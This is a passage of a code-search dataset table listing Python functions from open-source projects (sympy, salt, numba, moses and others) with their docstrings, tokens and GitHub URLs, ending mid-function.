nwo
stringlengths 5
106
| sha
stringlengths 40
40
| path
stringlengths 4
174
| language
stringclasses 1
value | identifier
stringlengths 1
140
| parameters
stringlengths 0
87.7k
| argument_list
stringclasses 1
value | return_statement
stringlengths 0
426k
| docstring
stringlengths 0
64.3k
| docstring_summary
stringlengths 0
26.3k
| docstring_tokens
list | function
stringlengths 18
4.83M
| function_tokens
list | url
stringlengths 83
304
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
sympy/sympy
|
d822fcba181155b85ff2b29fe525adbafb22b448
|
sympy/series/limits.py
|
python
|
heuristics
|
(e, z, z0, dir)
|
return rv
|
Computes the limit of an expression term-wise.
Parameters are the same as for the ``limit`` function.
Works with the arguments of expression ``e`` one by one, computing
the limit of each and then combining the results. This approach
works only for simple limits, but it is fast.
|
Computes the limit of an expression term-wise.
Parameters are the same as for the ``limit`` function.
Works with the arguments of expression ``e`` one by one, computing
the limit of each and then combining the results. This approach
works only for simple limits, but it is fast.
|
[
"Computes",
"the",
"limit",
"of",
"an",
"expression",
"term",
"-",
"wise",
".",
"Parameters",
"are",
"the",
"same",
"as",
"for",
"the",
"limit",
"function",
".",
"Works",
"with",
"the",
"arguments",
"of",
"expression",
"e",
"one",
"by",
"one",
"computing",
"the",
"limit",
"of",
"each",
"and",
"then",
"combining",
"the",
"results",
".",
"This",
"approach",
"works",
"only",
"for",
"simple",
"limits",
"but",
"it",
"is",
"fast",
"."
] |
def heuristics(e, z, z0, dir):
"""Computes the limit of an expression term-wise.
Parameters are the same as for the ``limit`` function.
Works with the arguments of expression ``e`` one by one, computing
the limit of each and then combining the results. This approach
works only for simple limits, but it is fast.
"""
rv = None
if abs(z0) is S.Infinity:
rv = limit(e.subs(z, 1/z), z, S.Zero, "+" if z0 is S.Infinity else "-")
if isinstance(rv, Limit):
return
elif e.is_Mul or e.is_Add or e.is_Pow or e.is_Function:
r = []
for a in e.args:
l = limit(a, z, z0, dir)
if l.has(S.Infinity) and l.is_finite is None:
if isinstance(e, Add):
m = factor_terms(e)
if not isinstance(m, Mul): # try together
m = together(m)
if not isinstance(m, Mul): # try factor if the previous methods failed
m = factor(e)
if isinstance(m, Mul):
return heuristics(m, z, z0, dir)
return
return
elif isinstance(l, Limit):
return
elif l is S.NaN:
return
else:
r.append(l)
if r:
rv = e.func(*r)
if rv is S.NaN and e.is_Mul and any(isinstance(rr, AccumBounds) for rr in r):
r2 = []
e2 = []
for ii in range(len(r)):
if isinstance(r[ii], AccumBounds):
r2.append(r[ii])
else:
e2.append(e.args[ii])
if len(e2) > 0:
e3 = Mul(*e2).simplify()
l = limit(e3, z, z0, dir)
rv = l * Mul(*r2)
if rv is S.NaN:
try:
rat_e = ratsimp(e)
except PolynomialError:
return
if rat_e is S.NaN or rat_e == e:
return
return limit(rat_e, z, z0, dir)
return rv
|
[
"def",
"heuristics",
"(",
"e",
",",
"z",
",",
"z0",
",",
"dir",
")",
":",
"rv",
"=",
"None",
"if",
"abs",
"(",
"z0",
")",
"is",
"S",
".",
"Infinity",
":",
"rv",
"=",
"limit",
"(",
"e",
".",
"subs",
"(",
"z",
",",
"1",
"/",
"z",
")",
",",
"z",
",",
"S",
".",
"Zero",
",",
"\"+\"",
"if",
"z0",
"is",
"S",
".",
"Infinity",
"else",
"\"-\"",
")",
"if",
"isinstance",
"(",
"rv",
",",
"Limit",
")",
":",
"return",
"elif",
"e",
".",
"is_Mul",
"or",
"e",
".",
"is_Add",
"or",
"e",
".",
"is_Pow",
"or",
"e",
".",
"is_Function",
":",
"r",
"=",
"[",
"]",
"for",
"a",
"in",
"e",
".",
"args",
":",
"l",
"=",
"limit",
"(",
"a",
",",
"z",
",",
"z0",
",",
"dir",
")",
"if",
"l",
".",
"has",
"(",
"S",
".",
"Infinity",
")",
"and",
"l",
".",
"is_finite",
"is",
"None",
":",
"if",
"isinstance",
"(",
"e",
",",
"Add",
")",
":",
"m",
"=",
"factor_terms",
"(",
"e",
")",
"if",
"not",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"# try together",
"m",
"=",
"together",
"(",
"m",
")",
"if",
"not",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"# try factor if the previous methods failed",
"m",
"=",
"factor",
"(",
"e",
")",
"if",
"isinstance",
"(",
"m",
",",
"Mul",
")",
":",
"return",
"heuristics",
"(",
"m",
",",
"z",
",",
"z0",
",",
"dir",
")",
"return",
"return",
"elif",
"isinstance",
"(",
"l",
",",
"Limit",
")",
":",
"return",
"elif",
"l",
"is",
"S",
".",
"NaN",
":",
"return",
"else",
":",
"r",
".",
"append",
"(",
"l",
")",
"if",
"r",
":",
"rv",
"=",
"e",
".",
"func",
"(",
"*",
"r",
")",
"if",
"rv",
"is",
"S",
".",
"NaN",
"and",
"e",
".",
"is_Mul",
"and",
"any",
"(",
"isinstance",
"(",
"rr",
",",
"AccumBounds",
")",
"for",
"rr",
"in",
"r",
")",
":",
"r2",
"=",
"[",
"]",
"e2",
"=",
"[",
"]",
"for",
"ii",
"in",
"range",
"(",
"len",
"(",
"r",
")",
")",
":",
"if",
"isinstance",
"(",
"r",
"[",
"ii",
"]",
",",
"AccumBounds",
")",
":",
"r2",
".",
"append",
"(",
"r",
"[",
"ii",
"]",
")",
"else",
":",
"e2",
".",
"append",
"(",
"e",
".",
"args",
"[",
"ii",
"]",
")",
"if",
"len",
"(",
"e2",
")",
">",
"0",
":",
"e3",
"=",
"Mul",
"(",
"*",
"e2",
")",
".",
"simplify",
"(",
")",
"l",
"=",
"limit",
"(",
"e3",
",",
"z",
",",
"z0",
",",
"dir",
")",
"rv",
"=",
"l",
"*",
"Mul",
"(",
"*",
"r2",
")",
"if",
"rv",
"is",
"S",
".",
"NaN",
":",
"try",
":",
"rat_e",
"=",
"ratsimp",
"(",
"e",
")",
"except",
"PolynomialError",
":",
"return",
"if",
"rat_e",
"is",
"S",
".",
"NaN",
"or",
"rat_e",
"==",
"e",
":",
"return",
"return",
"limit",
"(",
"rat_e",
",",
"z",
",",
"z0",
",",
"dir",
")",
"return",
"rv"
] |
https://github.com/sympy/sympy/blob/d822fcba181155b85ff2b29fe525adbafb22b448/sympy/series/limits.py#L70-L128
|
|
dragondjf/QMarkdowner
|
fc79c85ca2949fa9ce3b317606ad7bbcd1299960
|
tftpy/TftpContexts.py
|
python
|
TftpContext.__init__
|
(self, host, port, timeout, dyn_file_func=None)
|
Constructor for the base context, setting shared instance
variables.
|
Constructor for the base context, setting shared instance
variables.
|
[
"Constructor",
"for",
"the",
"base",
"context",
"setting",
"shared",
"instance",
"variables",
"."
] |
def __init__(self, host, port, timeout, dyn_file_func=None):
"""Constructor for the base context, setting shared instance
variables."""
self.file_to_transfer = None
self.fileobj = None
self.options = None
self.packethook = None
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.settimeout(timeout)
self.timeout = timeout
self.state = None
self.next_block = 0
self.factory = TftpPacketFactory()
# Note, setting the host will also set self.address, as it's a property.
self.host = host
self.port = port
# The port associated with the TID
self.tidport = None
# Metrics
self.metrics = TftpMetrics()
# Fluag when the transfer is pending completion.
self.pending_complete = False
# Time when this context last received any traffic.
# FIXME: does this belong in metrics?
self.last_update = 0
# The last packet we sent, if applicable, to make resending easy.
self.last_pkt = None
self.dyn_file_func = dyn_file_func
# Count the number of retry attempts.
self.retry_count = 0
|
[
"def",
"__init__",
"(",
"self",
",",
"host",
",",
"port",
",",
"timeout",
",",
"dyn_file_func",
"=",
"None",
")",
":",
"self",
".",
"file_to_transfer",
"=",
"None",
"self",
".",
"fileobj",
"=",
"None",
"self",
".",
"options",
"=",
"None",
"self",
".",
"packethook",
"=",
"None",
"self",
".",
"sock",
"=",
"socket",
".",
"socket",
"(",
"socket",
".",
"AF_INET",
",",
"socket",
".",
"SOCK_DGRAM",
")",
"self",
".",
"sock",
".",
"settimeout",
"(",
"timeout",
")",
"self",
".",
"timeout",
"=",
"timeout",
"self",
".",
"state",
"=",
"None",
"self",
".",
"next_block",
"=",
"0",
"self",
".",
"factory",
"=",
"TftpPacketFactory",
"(",
")",
"# Note, setting the host will also set self.address, as it's a property.",
"self",
".",
"host",
"=",
"host",
"self",
".",
"port",
"=",
"port",
"# The port associated with the TID",
"self",
".",
"tidport",
"=",
"None",
"# Metrics",
"self",
".",
"metrics",
"=",
"TftpMetrics",
"(",
")",
"# Fluag when the transfer is pending completion.",
"self",
".",
"pending_complete",
"=",
"False",
"# Time when this context last received any traffic.",
"# FIXME: does this belong in metrics?",
"self",
".",
"last_update",
"=",
"0",
"# The last packet we sent, if applicable, to make resending easy.",
"self",
".",
"last_pkt",
"=",
"None",
"self",
".",
"dyn_file_func",
"=",
"dyn_file_func",
"# Count the number of retry attempts.",
"self",
".",
"retry_count",
"=",
"0"
] |
https://github.com/dragondjf/QMarkdowner/blob/fc79c85ca2949fa9ce3b317606ad7bbcd1299960/tftpy/TftpContexts.py#L70-L99
|
||
avocado-framework/avocado
|
1f9b3192e8ba47d029c33fe21266bd113d17811f
|
optional_plugins/varianter_yaml_to_mux/avocado_varianter_yaml_to_mux/mux.py
|
python
|
MuxTreeNode.merge
|
(self, other)
|
Merges `other` node into this one without checking the name of the
other node. New values are appended, existing values overwritten
and unaffected ones are kept. Then all other node children are
added as children (recursively they get either appended at the end
or merged into existing node in the previous position.
|
Merges `other` node into this one without checking the name of the
other node. New values are appended, existing values overwritten
and unaffected ones are kept. Then all other node children are
added as children (recursively they get either appended at the end
or merged into existing node in the previous position.
|
[
"Merges",
"other",
"node",
"into",
"this",
"one",
"without",
"checking",
"the",
"name",
"of",
"the",
"other",
"node",
".",
"New",
"values",
"are",
"appended",
"existing",
"values",
"overwritten",
"and",
"unaffected",
"ones",
"are",
"kept",
".",
"Then",
"all",
"other",
"node",
"children",
"are",
"added",
"as",
"children",
"(",
"recursively",
"they",
"get",
"either",
"appended",
"at",
"the",
"end",
"or",
"merged",
"into",
"existing",
"node",
"in",
"the",
"previous",
"position",
"."
] |
def merge(self, other):
"""
Merges `other` node into this one without checking the name of the
other node. New values are appended, existing values overwritten
and unaffected ones are kept. Then all other node children are
added as children (recursively they get either appended at the end
or merged into existing node in the previous position.
"""
for ctrl in other.ctrl:
if isinstance(ctrl, Control):
if ctrl.code == REMOVE_NODE:
remove = []
regexp = re.compile(ctrl.value)
for child in self.children:
if regexp.match(child.name):
remove.append(child)
for child in remove:
self.children.remove(child)
elif ctrl.code == REMOVE_VALUE:
remove = []
regexp = re.compile(ctrl.value)
for key in self.value:
if regexp.match(key):
remove.append(key)
for key in remove:
self.value.pop(key, None)
super(MuxTreeNode, self).merge(other)
if other.multiplex is True:
self.multiplex = True
elif other.multiplex is False:
self.multiplex = False
|
[
"def",
"merge",
"(",
"self",
",",
"other",
")",
":",
"for",
"ctrl",
"in",
"other",
".",
"ctrl",
":",
"if",
"isinstance",
"(",
"ctrl",
",",
"Control",
")",
":",
"if",
"ctrl",
".",
"code",
"==",
"REMOVE_NODE",
":",
"remove",
"=",
"[",
"]",
"regexp",
"=",
"re",
".",
"compile",
"(",
"ctrl",
".",
"value",
")",
"for",
"child",
"in",
"self",
".",
"children",
":",
"if",
"regexp",
".",
"match",
"(",
"child",
".",
"name",
")",
":",
"remove",
".",
"append",
"(",
"child",
")",
"for",
"child",
"in",
"remove",
":",
"self",
".",
"children",
".",
"remove",
"(",
"child",
")",
"elif",
"ctrl",
".",
"code",
"==",
"REMOVE_VALUE",
":",
"remove",
"=",
"[",
"]",
"regexp",
"=",
"re",
".",
"compile",
"(",
"ctrl",
".",
"value",
")",
"for",
"key",
"in",
"self",
".",
"value",
":",
"if",
"regexp",
".",
"match",
"(",
"key",
")",
":",
"remove",
".",
"append",
"(",
"key",
")",
"for",
"key",
"in",
"remove",
":",
"self",
".",
"value",
".",
"pop",
"(",
"key",
",",
"None",
")",
"super",
"(",
"MuxTreeNode",
",",
"self",
")",
".",
"merge",
"(",
"other",
")",
"if",
"other",
".",
"multiplex",
"is",
"True",
":",
"self",
".",
"multiplex",
"=",
"True",
"elif",
"other",
".",
"multiplex",
"is",
"False",
":",
"self",
".",
"multiplex",
"=",
"False"
] |
https://github.com/avocado-framework/avocado/blob/1f9b3192e8ba47d029c33fe21266bd113d17811f/optional_plugins/varianter_yaml_to_mux/avocado_varianter_yaml_to_mux/mux.py#L323-L353
|
||
openshift/openshift-tools
|
1188778e728a6e4781acf728123e5b356380fe6f
|
openshift/installer/vendored/openshift-ansible-3.9.40/roles/lib_utils/library/yedit.py
|
python
|
Yedit.pop
|
(self, path, key_or_item)
|
return (False, self.yaml_dict)
|
remove a key, value pair from a dict or an item for a list
|
remove a key, value pair from a dict or an item for a list
|
[
"remove",
"a",
"key",
"value",
"pair",
"from",
"a",
"dict",
"or",
"an",
"item",
"for",
"a",
"list"
] |
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
|
[
"def",
"pop",
"(",
"self",
",",
"path",
",",
"key_or_item",
")",
":",
"try",
":",
"entry",
"=",
"Yedit",
".",
"get_entry",
"(",
"self",
".",
"yaml_dict",
",",
"path",
",",
"self",
".",
"separator",
")",
"except",
"KeyError",
":",
"entry",
"=",
"None",
"if",
"entry",
"is",
"None",
":",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"if",
"isinstance",
"(",
"entry",
",",
"dict",
")",
":",
"# AUDIT:maybe-no-member makes sense due to fuzzy types",
"# pylint: disable=maybe-no-member",
"if",
"key_or_item",
"in",
"entry",
":",
"entry",
".",
"pop",
"(",
"key_or_item",
")",
"return",
"(",
"True",
",",
"self",
".",
"yaml_dict",
")",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"elif",
"isinstance",
"(",
"entry",
",",
"list",
")",
":",
"# AUDIT:maybe-no-member makes sense due to fuzzy types",
"# pylint: disable=maybe-no-member",
"ind",
"=",
"None",
"try",
":",
"ind",
"=",
"entry",
".",
"index",
"(",
"key_or_item",
")",
"except",
"ValueError",
":",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")",
"entry",
".",
"pop",
"(",
"ind",
")",
"return",
"(",
"True",
",",
"self",
".",
"yaml_dict",
")",
"return",
"(",
"False",
",",
"self",
".",
"yaml_dict",
")"
] |
https://github.com/openshift/openshift-tools/blob/1188778e728a6e4781acf728123e5b356380fe6f/openshift/installer/vendored/openshift-ansible-3.9.40/roles/lib_utils/library/yedit.py#L521-L551
|
|
CoinCheung/BiSeNet
|
f9231b7c971413e6ebdfcd961fbea53417b18851
|
lib/models/bisenetv2.py
|
python
|
BiSeNetV2.__init__
|
(self, n_classes, aux_mode='train')
|
[] |
def __init__(self, n_classes, aux_mode='train'):
super(BiSeNetV2, self).__init__()
self.aux_mode = aux_mode
self.detail = DetailBranch()
self.segment = SegmentBranch()
self.bga = BGALayer()
## TODO: what is the number of mid chan ?
self.head = SegmentHead(128, 1024, n_classes, up_factor=8, aux=False)
if self.aux_mode == 'train':
self.aux2 = SegmentHead(16, 128, n_classes, up_factor=4)
self.aux3 = SegmentHead(32, 128, n_classes, up_factor=8)
self.aux4 = SegmentHead(64, 128, n_classes, up_factor=16)
self.aux5_4 = SegmentHead(128, 128, n_classes, up_factor=32)
self.init_weights()
|
[
"def",
"__init__",
"(",
"self",
",",
"n_classes",
",",
"aux_mode",
"=",
"'train'",
")",
":",
"super",
"(",
"BiSeNetV2",
",",
"self",
")",
".",
"__init__",
"(",
")",
"self",
".",
"aux_mode",
"=",
"aux_mode",
"self",
".",
"detail",
"=",
"DetailBranch",
"(",
")",
"self",
".",
"segment",
"=",
"SegmentBranch",
"(",
")",
"self",
".",
"bga",
"=",
"BGALayer",
"(",
")",
"## TODO: what is the number of mid chan ?",
"self",
".",
"head",
"=",
"SegmentHead",
"(",
"128",
",",
"1024",
",",
"n_classes",
",",
"up_factor",
"=",
"8",
",",
"aux",
"=",
"False",
")",
"if",
"self",
".",
"aux_mode",
"==",
"'train'",
":",
"self",
".",
"aux2",
"=",
"SegmentHead",
"(",
"16",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"4",
")",
"self",
".",
"aux3",
"=",
"SegmentHead",
"(",
"32",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"8",
")",
"self",
".",
"aux4",
"=",
"SegmentHead",
"(",
"64",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"16",
")",
"self",
".",
"aux5_4",
"=",
"SegmentHead",
"(",
"128",
",",
"128",
",",
"n_classes",
",",
"up_factor",
"=",
"32",
")",
"self",
".",
"init_weights",
"(",
")"
] |
https://github.com/CoinCheung/BiSeNet/blob/f9231b7c971413e6ebdfcd961fbea53417b18851/lib/models/bisenetv2.py#L314-L329
|
||||
saltstack/salt
|
fae5bc757ad0f1716483ce7ae180b451545c2058
|
salt/modules/rh_service.py
|
python
|
status
|
(name, sig=None)
|
return results[name]
|
Return the status for a service.
If the name contains globbing, a dict mapping service name to True/False
values is returned.
.. versionchanged:: 2018.3.0
The service name can now be a glob (e.g. ``salt*``)
Args:
name (str): The name of the service to check
sig (str): Signature to use to find the service via ps
Returns:
bool: True if running, False otherwise
dict: Maps service name to True if running, False otherwise
CLI Example:
.. code-block:: bash
salt '*' service.status <service name> [service signature]
|
Return the status for a service.
If the name contains globbing, a dict mapping service name to True/False
values is returned.
|
[
"Return",
"the",
"status",
"for",
"a",
"service",
".",
"If",
"the",
"name",
"contains",
"globbing",
"a",
"dict",
"mapping",
"service",
"name",
"to",
"True",
"/",
"False",
"values",
"is",
"returned",
"."
] |
def status(name, sig=None):
"""
Return the status for a service.
If the name contains globbing, a dict mapping service name to True/False
values is returned.
.. versionchanged:: 2018.3.0
The service name can now be a glob (e.g. ``salt*``)
Args:
name (str): The name of the service to check
sig (str): Signature to use to find the service via ps
Returns:
bool: True if running, False otherwise
dict: Maps service name to True if running, False otherwise
CLI Example:
.. code-block:: bash
salt '*' service.status <service name> [service signature]
"""
if sig:
return bool(__salt__["status.pid"](sig))
contains_globbing = bool(re.search(r"\*|\?|\[.+\]", name))
if contains_globbing:
services = fnmatch.filter(get_all(), name)
else:
services = [name]
results = {}
for service in services:
if _service_is_upstart(service):
cmd = "status {}".format(service)
results[service] = "start/running" in __salt__["cmd.run"](
cmd, python_shell=False
)
else:
cmd = "/sbin/service {} status".format(service)
results[service] = (
__salt__["cmd.retcode"](cmd, python_shell=False, ignore_retcode=True)
== 0
)
if contains_globbing:
return results
return results[name]
|
[
"def",
"status",
"(",
"name",
",",
"sig",
"=",
"None",
")",
":",
"if",
"sig",
":",
"return",
"bool",
"(",
"__salt__",
"[",
"\"status.pid\"",
"]",
"(",
"sig",
")",
")",
"contains_globbing",
"=",
"bool",
"(",
"re",
".",
"search",
"(",
"r\"\\*|\\?|\\[.+\\]\"",
",",
"name",
")",
")",
"if",
"contains_globbing",
":",
"services",
"=",
"fnmatch",
".",
"filter",
"(",
"get_all",
"(",
")",
",",
"name",
")",
"else",
":",
"services",
"=",
"[",
"name",
"]",
"results",
"=",
"{",
"}",
"for",
"service",
"in",
"services",
":",
"if",
"_service_is_upstart",
"(",
"service",
")",
":",
"cmd",
"=",
"\"status {}\"",
".",
"format",
"(",
"service",
")",
"results",
"[",
"service",
"]",
"=",
"\"start/running\"",
"in",
"__salt__",
"[",
"\"cmd.run\"",
"]",
"(",
"cmd",
",",
"python_shell",
"=",
"False",
")",
"else",
":",
"cmd",
"=",
"\"/sbin/service {} status\"",
".",
"format",
"(",
"service",
")",
"results",
"[",
"service",
"]",
"=",
"(",
"__salt__",
"[",
"\"cmd.retcode\"",
"]",
"(",
"cmd",
",",
"python_shell",
"=",
"False",
",",
"ignore_retcode",
"=",
"True",
")",
"==",
"0",
")",
"if",
"contains_globbing",
":",
"return",
"results",
"return",
"results",
"[",
"name",
"]"
] |
https://github.com/saltstack/salt/blob/fae5bc757ad0f1716483ce7ae180b451545c2058/salt/modules/rh_service.py#L495-L541
|
|
numba/numba
|
bf480b9e0da858a65508c2b17759a72ee6a44c51
|
numba/core/datamodel/models.py
|
python
|
DataModel.traverse
|
(self, builder)
|
return []
|
Traverse contained members.
Returns a iterable of contained (types, getters).
Each getter is a one-argument function accepting a LLVM value.
|
Traverse contained members.
Returns a iterable of contained (types, getters).
Each getter is a one-argument function accepting a LLVM value.
|
[
"Traverse",
"contained",
"members",
".",
"Returns",
"a",
"iterable",
"of",
"contained",
"(",
"types",
"getters",
")",
".",
"Each",
"getter",
"is",
"a",
"one",
"-",
"argument",
"function",
"accepting",
"a",
"LLVM",
"value",
"."
] |
def traverse(self, builder):
"""
Traverse contained members.
Returns a iterable of contained (types, getters).
Each getter is a one-argument function accepting a LLVM value.
"""
return []
|
[
"def",
"traverse",
"(",
"self",
",",
"builder",
")",
":",
"return",
"[",
"]"
] |
https://github.com/numba/numba/blob/bf480b9e0da858a65508c2b17759a72ee6a44c51/numba/core/datamodel/models.py#L89-L95
|
|
home-assistant/core
|
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
|
homeassistant/components/renault/renault_entities.py
|
python
|
RenaultEntity.__init__
|
(
self,
vehicle: RenaultVehicleProxy,
description: EntityDescription,
)
|
Initialise entity.
|
Initialise entity.
|
[
"Initialise",
"entity",
"."
] |
def __init__(
self,
vehicle: RenaultVehicleProxy,
description: EntityDescription,
) -> None:
"""Initialise entity."""
self.vehicle = vehicle
self.entity_description = description
self._attr_device_info = self.vehicle.device_info
self._attr_unique_id = f"{self.vehicle.details.vin}_{description.key}".lower()
|
[
"def",
"__init__",
"(",
"self",
",",
"vehicle",
":",
"RenaultVehicleProxy",
",",
"description",
":",
"EntityDescription",
",",
")",
"->",
"None",
":",
"self",
".",
"vehicle",
"=",
"vehicle",
"self",
".",
"entity_description",
"=",
"description",
"self",
".",
"_attr_device_info",
"=",
"self",
".",
"vehicle",
".",
"device_info",
"self",
".",
"_attr_unique_id",
"=",
"f\"{self.vehicle.details.vin}_{description.key}\"",
".",
"lower",
"(",
")"
] |
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/renault/renault_entities.py#L33-L42
|
||
meetbill/zabbix_manager
|
739e5b51facf19cc6bda2b50f29108f831cf833e
|
ZabbixTool/lib_zabbix/w_lib/mylib/xlwt/Autofit.py
|
python
|
HandleBlankCell
|
(workBook, row, cell)
|
return HandleDefaultCell(workBook, row, cell)
|
Will handle blank cells using the default handler
|
Will handle blank cells using the default handler
|
[
"Will",
"handle",
"blank",
"cells",
"using",
"the",
"default",
"handler"
] |
def HandleBlankCell(workBook, row, cell):
"""
Will handle blank cells using the default handler
"""
if workBook.emptyCellsAreZero:
return 0
return HandleDefaultCell(workBook, row, cell)
|
[
"def",
"HandleBlankCell",
"(",
"workBook",
",",
"row",
",",
"cell",
")",
":",
"if",
"workBook",
".",
"emptyCellsAreZero",
":",
"return",
"0",
"return",
"HandleDefaultCell",
"(",
"workBook",
",",
"row",
",",
"cell",
")"
] |
https://github.com/meetbill/zabbix_manager/blob/739e5b51facf19cc6bda2b50f29108f831cf833e/ZabbixTool/lib_zabbix/w_lib/mylib/xlwt/Autofit.py#L320-L328
|
|
sagemath/sage
|
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
|
src/sage/interfaces/mathics.py
|
python
|
Mathics._object_class
|
(self)
|
return MathicsElement
|
r"""
Return the element class of this parent.
This is used in the interface class.
EXAMPLES::
sage: mathics._object_class()
<class 'sage.interfaces.mathics.MathicsElement'>
|
r"""
Return the element class of this parent.
This is used in the interface class.
|
[
"r",
"Return",
"the",
"element",
"class",
"of",
"this",
"parent",
".",
"This",
"is",
"used",
"in",
"the",
"interface",
"class",
"."
] |
def _object_class(self):
r"""
Return the element class of this parent.
This is used in the interface class.
EXAMPLES::
sage: mathics._object_class()
<class 'sage.interfaces.mathics.MathicsElement'>
"""
return MathicsElement
|
[
"def",
"_object_class",
"(",
"self",
")",
":",
"return",
"MathicsElement"
] |
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/interfaces/mathics.py#L729-L740
|
|
JetBrains/python-skeletons
|
95ad24b666e475998e5d1cc02ed53a2188036167
|
builtins.py
|
python
|
int.__lshift__
|
(self, n)
|
return 0
|
x shifted left by n bits.
:type n: numbers.Integral
:rtype: int
|
x shifted left by n bits.
|
[
"x",
"shifted",
"left",
"by",
"n",
"bits",
"."
] |
def __lshift__(self, n):
"""x shifted left by n bits.
:type n: numbers.Integral
:rtype: int
"""
return 0
|
[
"def",
"__lshift__",
"(",
"self",
",",
"n",
")",
":",
"return",
"0"
] |
https://github.com/JetBrains/python-skeletons/blob/95ad24b666e475998e5d1cc02ed53a2188036167/builtins.py#L488-L494
|
|
molecularsets/moses
|
7b8f83b21a9b7ded493349ec8ef292384ce2bb52
|
moses/metrics/metrics.py
|
python
|
get_all_metrics
|
(gen, k=None, n_jobs=1,
device='cpu', batch_size=512, pool=None,
test=None, test_scaffolds=None,
ptest=None, ptest_scaffolds=None,
train=None)
|
return metrics
|
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
test (None or list): test SMILES. If None, will load
a default test set
test_scaffolds (None or list): scaffold test SMILES. If None, will
load a default scaffold test set
ptest (None or dict): precalculated statistics of the test set. If
None, will load default test statistics. If you specified a custom
test set, default test statistics will be ignored
ptest_scaffolds (None or dict): precalculated statistics of the
scaffold test set If None, will load default scaffold test
statistics. If you specified a custom test set, default test
statistics will be ignored
train (None or list): train SMILES. If None, will load a default
train set
Available metrics:
* %valid
* %unique@k
* Frechet ChemNet Distance (FCD)
* Fragment similarity (Frag)
* Scaffold similarity (Scaf)
* Similarity to nearest neighbour (SNN)
* Internal diversity (IntDiv)
* Internal diversity 2: using square root of mean squared
Tanimoto similarity (IntDiv2)
* %passes filters (Filters)
* Distribution difference for logP, SA, QED, weight
* Novelty (molecules not present in train)
|
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
|
[
"Computes",
"all",
"available",
"metrics",
"between",
"test",
"(",
"scaffold",
"test",
")",
"and",
"generated",
"sets",
"of",
"SMILES",
".",
"Parameters",
":",
"gen",
":",
"list",
"of",
"generated",
"SMILES",
"k",
":",
"int",
"or",
"list",
"with",
"values",
"for",
"unique@k",
".",
"Will",
"calculate",
"number",
"of",
"unique",
"molecules",
"in",
"the",
"first",
"k",
"molecules",
".",
"Default",
"[",
"1000",
"10000",
"]",
"n_jobs",
":",
"number",
"of",
"workers",
"for",
"parallel",
"processing",
"device",
":",
"cpu",
"or",
"cuda",
":",
"n",
"where",
"n",
"is",
"GPU",
"device",
"number",
"batch_size",
":",
"batch",
"size",
"for",
"FCD",
"metric",
"pool",
":",
"optional",
"multiprocessing",
"pool",
"to",
"use",
"for",
"parallelization"
] |
def get_all_metrics(gen, k=None, n_jobs=1,
device='cpu', batch_size=512, pool=None,
test=None, test_scaffolds=None,
ptest=None, ptest_scaffolds=None,
train=None):
"""
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
test (None or list): test SMILES. If None, will load
a default test set
test_scaffolds (None or list): scaffold test SMILES. If None, will
load a default scaffold test set
ptest (None or dict): precalculated statistics of the test set. If
None, will load default test statistics. If you specified a custom
test set, default test statistics will be ignored
ptest_scaffolds (None or dict): precalculated statistics of the
scaffold test set If None, will load default scaffold test
statistics. If you specified a custom test set, default test
statistics will be ignored
train (None or list): train SMILES. If None, will load a default
train set
Available metrics:
* %valid
* %unique@k
* Frechet ChemNet Distance (FCD)
* Fragment similarity (Frag)
* Scaffold similarity (Scaf)
* Similarity to nearest neighbour (SNN)
* Internal diversity (IntDiv)
* Internal diversity 2: using square root of mean squared
Tanimoto similarity (IntDiv2)
* %passes filters (Filters)
* Distribution difference for logP, SA, QED, weight
* Novelty (molecules not present in train)
"""
if test is None:
if ptest is not None:
raise ValueError(
"You cannot specify custom test "
"statistics for default test set")
test = get_dataset('test')
ptest = get_statistics('test')
if test_scaffolds is None:
if ptest_scaffolds is not None:
raise ValueError(
"You cannot specify custom scaffold test "
"statistics for default scaffold test set")
test_scaffolds = get_dataset('test_scaffolds')
ptest_scaffolds = get_statistics('test_scaffolds')
train = train or get_dataset('train')
if k is None:
k = [1000, 10000]
disable_rdkit_log()
metrics = {}
close_pool = False
if pool is None:
if n_jobs != 1:
